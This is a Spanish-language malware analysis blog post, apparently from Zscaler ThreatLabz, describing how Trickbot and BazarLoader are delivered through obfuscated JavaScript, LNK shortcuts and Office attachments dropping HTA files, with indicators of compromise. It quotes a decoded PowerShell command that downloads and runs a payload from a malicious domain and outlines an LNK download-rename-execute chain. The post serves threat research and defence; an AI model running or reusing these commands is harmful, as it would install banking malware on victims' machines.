Las nuevas campañas de Trickbot y BazarLoader utilizan múltiples vectores de entrega

El equipo de investigación de Zscaler ThreatLabz supervisa miles de archivos diariamente rastreando amenazas nuevas y generalizadas, incluido uno de los troyanos bancarios más destacados de los últimos cinco años: Trickbot. Trickbot lleva activo desde 2016 y está vinculado a un gran número de campañas maliciosas que involucran la minería de bitcoin y el robo de información bancaria, información de identificación personal (PII) y credenciales. BazarLoader es un producto secundario de este troyano, desarrollado por los mismos autores. Ambos son particularmente peligrosos, ya que son fácilmente modificables y capaces de entregar cargas útiles multietapa, así como de tomar el control de los ordenadores por completo.

ThreatLabz ha descubierto a los operadores de Trickbot utilizando nuevos enfoques para entregar cargas útiles en recientes campañas de ataques. Las muestras de malware que analizamos estaban bien elaboradas y altamente ofuscadas con capacidades de evasión de sandbox. En esta publicación del blog, mostraremos el análisis de los diferentes vectores de entrega utilizados por Trickbot y BazarLoader.

Puntos clave:

1. Los archivos Script y LNK añaden técnicas de evasión para aprovechar las amenazas de malware.

2. La ofuscación multicapa se utiliza para impedir el análisis de archivos JS y LNK.

3. Un adjunto de Office suelta un archivo HTA con fragmentos de funciones HTML y javascript.

4. Se utilizan dominios recientemente registrados para entregar amenazas.

Trickbot está ampliando su gama de tipos de archivos para la entrega de malware

En campañas anteriores, las cargas útiles de Trickbot se soltaban generalmente como archivos adjuntos maliciosos de Microsoft Office. En el último mes, hemos visto que el malware también ha utilizado un gran volumen de archivos javascript, junto con diversos formatos de archivo, como se muestra en los siguientes gráficos:

 

Fig. 1: Trickbot bloqueado en Zscaler Cloud Sandbox

Fig. 2: BazarLoader bloqueado en Zscaler Cloud Sandbox

En este blog, exploraremos la cadena de ataque para múltiples vectores de entrega, que incluyen: 

• Trickbot se propaga a través de archivos de script
• Trickbot se propaga a través de archivos LNK
• BazarLoader se propaga a través de archivos adjuntos de Office

Trickbot se propaga a través de archivos de script

Trickbot logra la intrusión utilizando correos electrónicos de spam agrupados con adjuntos javascript maliciosos, como los siguientes:  

Fig. 3: Adjuntos de correo electrónico de spam

En este caso, el archivo javascript [5B606A5495A55F2BD8559778A620F21B] tiene tres capas de ofuscación que se utilizan principalmente para evadir y omitir entornos de sandbox. A continuación se muestra la instantánea de la primera capa ofuscada:

Fig. 4: Primera capa de ofuscación en javascript

Además de hacer un esfuerzo extremo por hacer que los archivos javascript estén muy ofuscados, los autores de malware también han añadido grandes cantidades de código basura al final para que sea más difícil depurar. El código basura consta simplemente de cadenas ofuscadas generadas aleatoriamente que no desempeñan ningún papel en el código malicioso.

Fig. 5: Código de correo basura para dificultar el análisis

Usando la función eval() hemos liberado la segunda capa en la que el código malicioso está integrado con más código de correo no deseado. Después de eliminar esta capa de código basura, la función eval() se utiliza una vez más para recuperar la capa final de código. Podemos ver que los autores de Trickbot utilizaron el método setTimeout(), que evalúa una expresión después de 967 milisegundos para retrasar la ejecución en el sandbox. Esto ayuda al malware a evadir los entornos sandbox.

Fig. 6: Segunda capa de ofuscación en javascript

En la captura anterior podemos ver el método replace implementado en el código donde "hdBDJ" y las cadenas "tSJVh" se eliminan de las variables "YHPhEFtKjqbCmAZ" y "kVYJOrLSqvdAWnaGTX", respectivamente, para obtener la cadena final.

Fig. 7: Capa final

El javascript malicioso ejecuta cmd.exe como proceso hijo, luego cmd.exe ejecuta powershell.exe para descargar Trickbot como carga útil. 

Flujo de ejecución: 

Wscript.exe ->cmd.exe->powershell.exe

Powershell.exe integrado con el comando codificado base64 y después de decodificar el comando siguiente es:

IEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php")

Fig. 8: Detección de Javascript Downloader por Zscaler Cloud Sandbox

Trickbot se propaga a través de archivos LNK

Por lo general, los usuarios ven las extensiones LNK de Windows (LNK) como accesos directos y hemos observado con frecuencia que los ciberdelincuentes utilizan archivos LNK para descargar archivos maliciosos como Trickbot. Trickbot oculta el código en la sección de argumento, en la sección de propiedades del archivo LNK. El autor del malware añadió espacios adicionales entre el código malicioso para intentar dificultar la depuración del código por parte de los investigadores. Hemos visto esta técnica utilizada anteriormente en la campaña de Emotet, que utilizaba archivos adjuntos maliciosos de Office en 2018.

Fig. 9: Código integrado en la sección de propiedades de LNK

Descargando Trickbot:

1. LNK descarga el archivo de 45.148.121.227/images/readytunes.png utilizando un argumento silencioso para que el usuario no pueda ver ningún mensaje de error o acción de progreso.
2. Después de la descarga, el malware guarda el archivo en la carpeta Temp con el nombre application1_form.pdf.
3. Por último, se cambia el nombre del archivo de application1_form.pdf a support.exe y se ejecuta. Aquí, support.exe es Trickbot.

Fig. 10: Detección de LNK Downloader por Zscaler Cloud Sandbox

BazarLoader se propaga a través de archivos adjuntos de Office

Esta es una de las otras técnicas utilizadas en TA551 APT también conocida como Shathak. Los documentos de Office maliciosos sueltan el archivo HTA en "C\ProgramData\sda.HTA". Este archivo HTA contiene HTML y vbscript diseñados para recuperar un DLL malicioso con el fin de infectar un host vulnerable de Windows con BazarLoader. 

Una vez habilitado para macros, el proceso mshta.exe se ejecuta para descargar una carga útil. En el pasado, se ha observado que esta campaña entrega BazarLoader y Trickbot.

Fig. 11: Cadena de ataque del archivo DOC para descargar BazarLoader

Los datos codificados en base64 se implementan en la etiqueta HTML <div>, que se utiliza posteriormente con javascript.

Fig. 12: Archivo HTA abandonado, codificación maliciosa en base64 bajo la sección HTML <div>

A continuación se muestra la instantánea de los datos base64 de decodificación en la que podemos ver cómo se descarga la carga útil y se guarda como FriIFriend.jpg en la máquina víctima:

Fig. 13: Archivo HTA abandonado, datos base64 de decodificación

Redes: C&C para descargar BazarLoader

Fig. 14: Enviar solicitud para descargar BazarLoader

También hemos observado dominios recién registrados (NRD) creados específicamente para distribuir estas cargas útiles, utilizando un stealer entregado a través de correo electrónico de spam y agrupado con un archivo adjunto malicioso de Microsoft Office.

Fig. 15: Dominio recién registrado

Fig. 16: Detección de Zscaler Cloud Sandbox del descargador de archivos de Office maliciosos

JS.Downloader.Trickbot

Win32.Backdoor.BazarLoader

VBA.Downloader.BazarLoader

MITRE ATT&CK

 

 

Indicadores de compromiso

 

 

 

URL asociadas:

jolantagraban.pl/log/57843441668980/dll/assistant.php

blomsterhuset-villaflora.dk/assistant.php

d15k2d11r6t6rl.cloudfront.net/public/users/beefree

C&C: